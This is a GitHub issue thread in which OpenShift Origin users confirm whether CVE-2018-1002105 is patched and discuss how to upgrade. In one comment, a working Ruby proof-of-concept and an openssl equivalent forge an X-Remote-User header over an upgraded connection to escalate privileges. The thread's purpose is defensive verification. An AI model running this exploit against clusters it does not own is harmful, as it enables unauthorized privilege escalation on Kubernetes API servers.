Closed clcollins closed 4 years ago
It kind of looks like a new openshift/origin-control-plane:v3.10.0 was released last night. I also saw this in the git log of the release-3.10 branch:
commit 8a7096453e33bb8992c6d3c3c90116a8088902b0
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date: Mon Dec 3 16:20:34 2018 -0800
Merge pull request #21601 from deads2k/cve-23-ok-3.10
UPSTREAM: 00000: Verify backend upgrade
I'd love to hear from the devs, though.
Does anyone have a proof of concept or test harness of sorts, short of checking the container version, besides reading the exploit and figuring out how all of this port handling goes?
So 4 hrs in and not a word? I know these bits are "free as in beer", but it's still important that the people drinking the free beer aren't drinking poison... If I didn't know any better, I'd think that the lack of messaging was by design?
Send my regards to whoever my Solutions Architect is now that he's a chief architect, as we are/were so close to at least getting pricing... But this... C'mon.
Is the origin-control-plane:v3.10.0 pushed to Docker Hub last night free of this CVE or not?
I would also like to know whether the fix will be backported to 3.6.
Ok, well, in terms of 3.10: the binaries in the origin-control-plane:v3.10.0 container both have a symbol for proxy.getResponseCode and have a version string which includes the first 8 chars of @deads2k's last PR merge.
# oc -n kube-system rsh master-api-[redacted]
sh-4.2# nm openshift | egrep getResponseCode
00000000014b79b0 t github.com/openshift/origin/vendor/k8s.io/apimachinery/pkg/util/proxy.getResponseCode
sh-4.2# ./openshift version
openshift v3.10.0+8a70964-87
func getResponseCode(r io.Reader) (int, []byte, error) {
This method was added with the patch:
commit 8a7096453e33bb8992c6d3c3c90116a8088902b0 (HEAD -> release-3.10, origin/release-3.10)
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date: Mon Dec 3 16:20:34 2018 -0800
Merge pull request #21601 from deads2k/cve-23-ok-3.10
UPSTREAM: 00000: Verify backend upgrade
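Based on the version strings above, an unofficial sanity check for a patched 3.10 build can be scripted. This is a sketch that only matches the short hash 8a70964 of the merge commit shown above:

```shell
# Substitute the output of `openshift version` from your master here.
VER="v3.10.0+8a70964-87"

# The patched 3.10 build carries the short hash of merge commit
# 8a7096453e33 in its version string; earlier builds (e.g. +9e57eff) do not.
case "$VER" in
  *+8a70964*) echo "version string contains fix commit 8a70964 (patched)" ;;
  *)          echo "version string does NOT contain fix commit 8a70964" ;;
esac
```

This obviously only proves which commit the binary was cut from, not that the fix itself is effective.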
Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...
Some questions:
Does this backport mitigate the API extension attack (OCP 3.6 -> 3.11)?
What about the pod exec/attach/port-forward attack (OCP 3.2 -> 3.11)?
What about the 3.9 version: can we expect updates there as well?
How was that one solved?
Thanks in advance
Generally speaking, there is no confirmation that the fix above actually addresses this issue. Maybe a developer could confirm that this commit fixes it, and from which date on the Docker images contain the fix.
Any progress?
You can test for the presence of this vulnerability in the latest build of OKD using this container from Gravitational (the gravitational/cve-2018-1002105:latest image is hosted on Quay, and itself shows no vulnerabilities): https://github.com/gravitational/cve-2018-1002105
I am on the latest v3.11 and I am getting:
[root@baleia cve-2018-1002105]# go run main.go
Attempting to locate and load kubeconfig file
Loading: /root/.kube/config
Testing for unauthenticated access...
API allows unauthenticated access
Testing for privilege escalation...
API is vulnerable to CVE-2018-1002105
@gfvirga
I have the same issue. I'm using v3.9.0 with the mitigation applied and get the same output. When you look at the code, in the first step it's simply testing https://
Or... I'm simply doing something wrong :)
You can't hit the load balancer. It caught me at first, but I saw in the README.md that this is a problem. I find it best to create a new kubeconfig and feed it into the container or pass it to the Go app.
You also need "list pods in all namespaces" as well as "list all namespaces", as that is the discovery process of this app. In other words, create a ClusterRole (and ClusterRoleBinding):
# oc get clusterroles/listns -o yaml
apiVersion: authorization.openshift.io/v1
kind: ClusterRole
metadata:
name: listns
rules:
- apiGroups:
- ""
attributeRestrictions: null
resources:
- namespaces
- pods
verbs:
- get
- list
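For completeness, a matching binding might look like this. This sketch uses the standard Kubernetes RBAC API rather than the OpenShift-specific one above, and cve-test-user is a placeholder for whatever identity your test kubeconfig authenticates as:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: listns
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: listns
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: cve-test-user  # placeholder: the user from your test kubeconfig
```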
I found a simple test (exploit) described in this blog post by Ariel Zalivansky (the author used Ubuntu, but you can port it easily to CentOS/RHEL):
apt-get update && apt-get install -y ruby git
git clone https://gist.github.com/2d09ec0ad600667980359394a2a65a0d.git
cd 2d09ec0ad600667980359394a2a65a0d/
chmod +x poc.rb
./poc.rb
Note that before executing the Ruby script in the final line you will probably need to modify the `host = 'kubernetes'` variable in your local copy of poc.rb.
For posterity, poc.rb contains the following code:
#!/usr/bin/env ruby
require 'socket'
require 'openssl'
require 'json'
host = 'kubernetes'
metrics = '/apis/metrics.k8s.io/v1beta1'
sock = TCPSocket.new host, 443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect
ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n"
6.times { puts ssl.gets }
puts JSON.pretty_generate JSON.parse ssl.gets
ssl.close
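For hosts without Ruby, roughly the same probe can be attempted with openssl s_client. This is an untested sketch of what poc.rb does, not a verified exploit; HOST needs the same adjustment as in the script:

```shell
HOST=kubernetes                          # adjust, as with poc.rb
METRICS=/apis/metrics.k8s.io/v1beta1

# Send the broken upgrade request, then reuse the same TLS connection for a
# follow-up request that sets X-Remote-User, mirroring the two ssl.puts calls.
{
  printf 'GET %s HTTP/1.1\r\nHost: %s\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n' \
    "$METRICS" "$HOST"
  sleep 1
  printf 'GET %s/pods HTTP/1.1\r\nHost: %s\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n' \
    "$METRICS" "$HOST"
  sleep 1
} | openssl s_client -quiet -connect "$HOST:443"
```

On a patched API server, the second request should no longer be answered as the privileged user.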
I actually tested this procedure manually and was able to exploit the CVE when both pods run on the same node. I tried the same on 3.11 (installed 60 minutes ago) and it does not appear to be exploitable.
Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...
We upgraded one of our environments from 3.9 to 3.10 four days ago and appear to have the patched version:
sh-4.2# openshift version
openshift v3.10.0+8a70964-87
We previously upgraded another environment (12 days ago) and, as expected, it has the not-yet-patched version of 3.10:
sh-4.2# openshift version
openshift v3.10.0+9e57eff-83
However, when re-running /usr/share/ansible/openshift-ansible/playbooks/byo/openshift-cluster/upgrades/v3_10/upgrade.yml on this environment, it does not upgrade it. The control plane binaries remain at openshift v3.10.0+9e57eff-83.
@mshutt How did you update your existing 3.10 environment?
Howdy @skynardo. I just wrote a playbook that does a docker pull... and if changed, it does the /usr/local/bin/restart-masters (or something like that) for both the api and controller... and it has a serial of 1 and a delay period between iterations.
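For anyone wanting to reproduce that approach, a rough sketch of such a playbook might look like the following. The inventory group name, the image tag, and the 60-second pause are assumptions; adjust them to your environment:

```yaml
# Sketch only: roll the rebuilt origin-control-plane image across masters one
# at a time, restarting the api/controllers services when the image changed.
- hosts: masters          # assumption: your inventory group for master nodes
  serial: 1
  tasks:
    - name: Pull the rebuilt control-plane image
      command: docker pull docker.io/openshift/origin-control-plane:v3.10.0
      register: pull
      changed_when: "'Downloaded newer image' in pull.stdout"

    - name: Restart master API
      command: /usr/local/bin/master-restart api
      when: pull.changed

    - name: Restart master controllers
      command: /usr/local/bin/master-restart controllers
      when: pull.changed

    - name: Give the control plane time to settle before the next master
      pause:
        seconds: 60
      when: pull.changed
```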
Thanks, will give that a go.
I use version 3.7. Will a patch be available for this version?
@mshutt Would it be possible to share that playbook?
@morodin, I can share the commands I ran remotely from our Ansible server using the shell module:
ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10"
ansible masters[0] -m shell -a "/usr/local/bin/master-restart api"
ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"
That only gets one master, but...
And I'm not sure that's right... We used v3.10.0
Thanks for that; it might be easier than running the upgrade playbook (which seemed to work in our case).
@morodin - we ran the upgrade playbook too. I still had to manually pull the new images for some reason.
We also ran into issues with the origin-node container stopping but not being removed, so the systemd origin-node.service would not start, and I had to delete the container with runc to get it to continue. Did you run into either of those issues?
@clcollins No, our upgrade ran through without issues, pulling version v3.10.0+8a70964-87, which should be the patched one.
@clcollins When you say origin-node container, are you referring to the sync pods in the openshift-node project? I see that these pods are still running openshift v3.10.0+9e57eff-83 in our environment that was upgraded to 3.10 prior to the fix. @mshutt, thanks for the correction on v3.10.0.
@skynardo It was clcollins who made that statement.
@morodin, are you saying that you had an existing 3.10 environment that was NOT at v3.10.0+8a70964-87, and you ran the upgrade playbook again and it deployed the patched version (v3.10.0+8a70964-87)? I have not been able to make that work. I might try newer playbooks today.
@skynardo Yes, that is exactly what I did, just using the 3.10 upgrade playbook from the CentOS openshift-ansible package.
@skynardo: Not the sync node, but the origin-node container being run by the systemd origin-node service with runc, from /etc/systemd/system/origin-node.service.
# runc list
ID PID STATUS BUNDLE CREATED OWNER
origin-node 29457 running /var/lib/containers/atomic/origin-node.0 2018-12-12T15:06:09.801904732Z root
I think the sync node from the sync daemonset is running via Docker.
docker ps |grep sync
042835e362c3 8546ec1d6700 "/bin/bash -c '#!/..." 2 days ago Up 2 days
That's not the one that failed to be removed.
Does this patch for 3.7 also work with okd? https://access.redhat.com/errata/RHSA-2018:2906
@clcollins, I don't have runc installed on my masters/nodes. Are you running a containerized install, maybe?
I did try to run the latest version of the 3.10 playbooks and they fail when trying to restart node service on master[0]. We are running origin 3.10 on AWS EC2 using advanced install method, upgraded from 3.9 cluster.
systemctl status origin-node
● origin-node.service - OpenShift Node
   Loaded: loaded (/etc/systemd/system/origin-node.service; enabled; vendor preset: disabled)
   Active: active (running) since Thu 2018-12-20 12:02:43 UTC; 8h ago
     Docs: https://github.com/openshift/origin
 Main PID: 3712 (hyperkube)
   Memory: 67.9M
   CGroup: /system.slice/origin-node.service
...
@skynardo: Ah, yes, sorry - we are using the containerized install on Atomic hosts. We're using 3.11, with on-prem virtual machines.
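Since the RPM-based and containerized installs are updated differently, here is a sketch-level way to tell which one a host runs; the package and container names are taken from this thread and may differ on your hosts:

```shell
# RPM-based installs carry the origin-node package; containerized (Atomic)
# installs run origin-node as a system container under runc instead.
if rpm -q origin-node >/dev/null 2>&1; then
  echo "RPM-based install: update via yum / openshift-ansible"
elif runc list 2>/dev/null | grep -q '^origin-node '; then
  echo "containerized install: pull the new image and restart the service"
else
  echo "origin-node not found by either method"
fi
```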
If you need an unofficial confirmation that CVE-2018-1002105 was patched in OKD (master branch head) on Nov 08, just compare the openshift/origin patch to upgradeaware.go with the original kubernetes/kubernetes patch - they are identical.
Patch to Kubernetes' upgradeaware.go: Verify backend upgraded connection
Patch to OKD's upgradeaware.go: (just click Load Diff) UPSTREAM: 00000: Verify backend upgrade
The patched file is here. This issue should remain open until we get a release incorporating the patch. Most likely there will be no backports to older versions...
@mirekphd I'd personally leave it open in protest. The CVE was so heinous that free as in beer vs. free as in speech ought not even be a matter for discussion.
That said, it is patched clear back to at least the 3.9 release branch, I believe. Bins (containers) were stealth-cut for at least 3.10 and, I presume, other releases.
I am running OKD 3.9 with the advanced installation. I am not really sure how to patch it. Any ideas?
This went out back to 3.9 when the embargo was lifted, and rolling images and RPMs were built at that time (with the CentOS PaaS SIG releasing new RPMs).
There was a discussion on the mailing list about why the rolling releases model is used, but it effectively allows us to ensure new clusters and new nodes are always at latest. It does mean that you need to run an upgrade or pull latest images on control plane nodes, but that’s always been the case.
https://lists.openshift.redhat.com/openshift-archives/dev/2018-December/msg00014.html
I think I was wrong about this; it looks like David did backport it, and it would have been in the RPMs published to GCS and the rolling images.
@smarterclayton hey, thanks for the answer. However, I see that the PaaS SIG repos still have no updates, which leaves a lot of OpenShift Origin users in a vulnerable state.
From what I read on the mailing list, they need a tag in git to be able to build a new version. Could you please either create a v3.11.1 tag or recreate v3.11, so that the PaaS SIG could rebuild the RPMs with the patch?
@DanyC97 can you describe why you need a tag to rebuild? Can't you just generate a patch level build by refreshing the source tar?
@smarterclayton re-reading the mailing list just now: he asked for a release. I assumed @DanyC97 meant a git tag, but maybe it is a GitHub release? For clarity, here is the quote:
the fix to make it into 3.11/3.10 Origin branches => done [1] however i am just guessing those are the right PRs, someone from RH will need to confirm/ refute a new Origin release to be cut for 3.11/3.10 then i can start with the PaaS Sig work
Is it fixed or not in Origin?
It's mostly fixed.
The PRs were backported to the 3.10 and 3.11 branches and the Docker containers were rebuilt: https://hub.docker.com/r/openshift/origin-control-plane/tags
However, the CentOS PaaS release repos were NOT rebuilt, so if you run a non-containerized deployment with the master deployed from RPMs, you're still vulnerable, and you should upgrade to 3.11, which runs the master services via static kubelet pods.
okd/origin is a community effort, particularly the binary builds, and if you run it in production, I would highly recommend familiarizing yourself with the release and backporting process on GitHub, so that you can see for yourself which fixes got backported. Support for older releases can be hit-and-miss.
If you want actionable security bulletins and dependable long-term support, a Red Hat subscription would be your best bet. Like any community project, OKD is more of a DIY solution (though very close to upstream).
Issues go stale after 90d of inactivity.
Mark the issue as fresh by commenting /remove-lifecycle stale.
Stale issues rot after an additional 30d of inactivity and eventually close.
Exclude this issue from closing by commenting /lifecycle frozen.
If this issue is safe to close now please do so with /close.
/lifecycle stale
Stale issues rot after 30d of inactivity.
Mark the issue as fresh by commenting /remove-lifecycle rotten.
Rotten issues close after an additional 30d of inactivity.
Exclude this issue from closing by commenting /lifecycle frozen.
If this issue is safe to close now please do so with /close.
/lifecycle rotten /remove-lifecycle stale
Rotten issues close after 30d of inactivity.
Reopen the issue by commenting /reopen.
Mark the issue as fresh by commenting /remove-lifecycle rotten.
Exclude this issue from closing again by commenting /lifecycle frozen.
/close
@openshift-bot: Closing this issue.
It appears that Kubernetes has patched v1.10.11, v1.11.5, and v1.12.3 for CVE-2018-1002105, the pod exec/attach/port-forward and API extension attack(s) that were disclosed yesterday(?). Downstream OCP has either a patch or a mitigation available. I don't see any mention of the CVE in Origin in either the issues or commits yet (apologies if I'm missing something).
Is there a tracker for watching patches as they are applied to Origin, and once they land, can they immediately be applied using the documented OpenShift Ansible upgrade process? Or are there changes needed there as well?
Thanks!
Edit: FWIW, we're running v3.11